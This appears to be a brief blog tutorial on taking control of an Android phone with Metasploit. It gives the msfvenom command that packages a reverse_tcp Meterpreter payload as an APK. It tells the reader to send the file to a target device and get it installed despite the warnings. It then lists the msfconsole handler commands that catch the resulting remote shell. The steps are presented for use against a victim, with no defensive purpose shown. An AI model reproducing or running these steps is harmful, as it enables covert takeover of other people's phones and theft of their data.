Exploitng Android using Metasploit

     Step 1:-

  • Open Terminal or Root Terminal in Kali-Linux
  • Write the payload for android  which is given below 
    msfvenom -p android/meterpreter/reverse_tcp lhost=<Enter your IP address> lport=4444  > android.apk
  • You can use any lport like 4444,8080


    Step 2:-

  • Send the apk file to the targeted device

  • Then after installing it and it will ask for permission that shown bellow


  • Then aftertouch on install Anyway

    
  • It will look like that shown in the image [MainActivity]
    Step 3:-
  • Write commands shown bellow
  1. msfconsole
  2. use exploit/multi/handler
  3. set payload android/meterpreter/reverse_tcp
  4. set lhost <Your IP address> 
  5. set lport  <which you write in payload>
  6. run/exploit
  7. Then after click on mainactivity on android


[It's msfconsole]


[It's all commands]



                                          Review and comment will be appreciated 

                                           Thank you For your support 😃





Comments

Popular posts from this blog

Exploiting Windows 10 using payload and reverse_tcp(Metasploit)

What is TCP

What is reverse_tcp